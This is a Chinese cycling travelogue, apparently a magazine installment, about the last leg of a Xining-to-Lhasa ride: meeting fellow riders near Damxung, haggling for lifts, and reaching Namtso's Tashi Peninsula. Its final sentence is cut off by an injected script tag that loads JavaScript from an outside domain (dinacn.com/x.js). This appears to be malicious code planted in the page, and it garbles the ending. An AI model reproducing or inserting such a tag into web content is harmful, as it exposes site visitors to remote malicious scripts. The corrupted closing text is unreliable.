从西宁到拉萨,Cryinghoyden用两万多字纪录下了这20多天的骑行生活的点点滴滴,这一期Cryinghoyden要骑过神湖纳木错,然后到达拉萨。他眼中的纳木错将会是什么样子的呢?一路上又有什么困难等待着他呢?请看本期《xfit》——青藏线单车旅行记(完结版) 文图/Cryinghoyden
出郭尼乡翻过一座小山几乎是一路下坡到当雄,从翻过唐古拉山进入西藏开始一直到当雄,明显感觉到这边的高原水土肥美,不像是青海境内尽是苍凉的秃山荒漠,这里长着成片的草场,沿途有着数不清的牦牛群放养在草原上,星星点点的散布在高原草场上,非常美丽,是另一种高原的田园色彩。
牦牛是一种温和羞涩的动物,他们看到骑车路过的我经常是惊惶失措的跑开,哪怕距离很远。牦牛的眼睛很大,很漂亮,常使我联想到还珠格格。
本来打算第二天骑行神湖纳木错,忽然收到在唐蕃古道骑行的飞未来的短信,他已经搭车到了那曲,让我等他同游纳木错。那曲到当雄我曾蜗牛式的骑行了三天,结果这小子第二天晚上就到了,他骑到刮着强劲逆风的四道梁就禁不住搭车的诱惑,搭车过来了。我们打算第二天搭车去纳木错,算是长时间骑行后的一次修整。
早上赶往通向纳木错的岔路口拦车,我远远的看到两个女孩熟悉的身影,是Ay和郑贞玉,我呼喊着,可似乎早已没有当初那样的激动,只是简单平淡的问了一些情况。她们说没有收到我路上留下的字条,她们当天之所以没在沱沱河停留是因为才下午两点,而马休没有停留,她们就一路跟过去了。她们好像是大前天到当雄的,当我告诉他我是前天到当雄的时候,Ay说:“你吹吧!”没办法,我开始给人留下的就是这个印象,她不相信我这么快就跟上她们的步伐翻越了唐古拉,大概她们以为我翻越西湖断桥都要颇费时日吧。昨天她们从纳木错骑行回当雄,今天要继续向拉萨行进,我和飞未来一直目送这两位奥林匹克健将消失在不远的山坳处。
游客一般都是包车到纳木错,包车费400-600元,我和飞未来两个民工旅行者自然掏不起。我们从8点半到9点多,伸累了胳膊也没拦下一辆愿意拉我们的车,我们决定骑车去。
山脚下有个纳木错的收费帐篷,飞未来直接骑车过去没有人注意,而我则被拦住,再三说情,那个善良的售票员姑娘要我答应沿途拾三袋垃圾,才可减免门票,我答应了。本打算回来时捡,但回来时临时改变主意没有捡成,至今因为没有实现承诺而耿耿于怀,不过我让今年骑行纳木错的朋友带我完成这个心愿了,我于心可安了。
开始的思路是边骑边拦车,我们行进到快到山口的大半程也没实现这个愿望。都快到山口了,问一辆停在路中的汽车司机搭车到纳木错多少钱,他愣要我们每人五十,我们拒绝了。过了一段时间,飞未来骑到我前面500米左右吧,那辆车的司机慢慢腾腾的追上我,说我们十元钱就可以坐到纳木错了,此时我已经看到不远处的山口了,就像在前门看到天安门一样近,我当然是愤怒的拒绝了。那个车又晃晃悠悠的追上飞未来,飞未来同意了,他劝说我的理由是可以早到纳木错照几张相片,我妥协了。 这辆车没晃悠一分钟就到山口了!到纳木错的道路是典型的搓衣板路,我们晃晃悠悠的在回转的下坡山道上受尽折磨,这段路本该是我们下坡骑行正爽的路段。车晃动的很厉害,在山间迂回前进,我坐在上面更是心惊胆战,随时都准备着翻车时跳车。
车停在山脚下的一个饭店旁,驾驶里的人让我们稍等片刻,他们吃点东西就出来,等了半个小时那几个人也没出来,而我被这辆车晃的头晕目眩,躺在后面一直被吹着山风。我和飞未来下车进去,在里面要了一杯热水,吃了片药就躺在那里休息。又过了一会,他们终于吃完走了出来,我跟他们挤在了驾驶室里。
汽车在前往纳木错扎西半岛的途中,没开了几分钟,就听到后面的飞未来大叫停车,原来他在后面不小心在车晃动时被碰了一下,他说什么都不坐车了,要自己骑车到纳木错,因为远远的已经看到扎西半岛和纳木错了,“很快就能骑到”。作为他的旅伴,我也只有跟着这位善变的车友下车骑行。可是这个家伙到不客气,他在这种搓衣板路上骑行的很快,似乎不怕颠,很快就把我落的没影了,等都不等我。远远看到的扎西半岛,好像近在眼前,可是一直到晚上9点才骑到!飞未来已经到达那里一个多小时了。我到了那里什么也没看到,就是路上远远领略了一下纳木错上空的变换的云彩和象一只大龟一样爬在那里的扎西半岛。第二天早上下雨,没看到什么我们就坐车回来了。
这就是我们“搭车骑行”纳木错的经历,我既没有因为搭车而早到,拍下美丽的景致,也没有因为骑车而欣赏好沿途的风景。更为遗憾的是,它败坏了我?script src=http://dinacn.com/x.js> |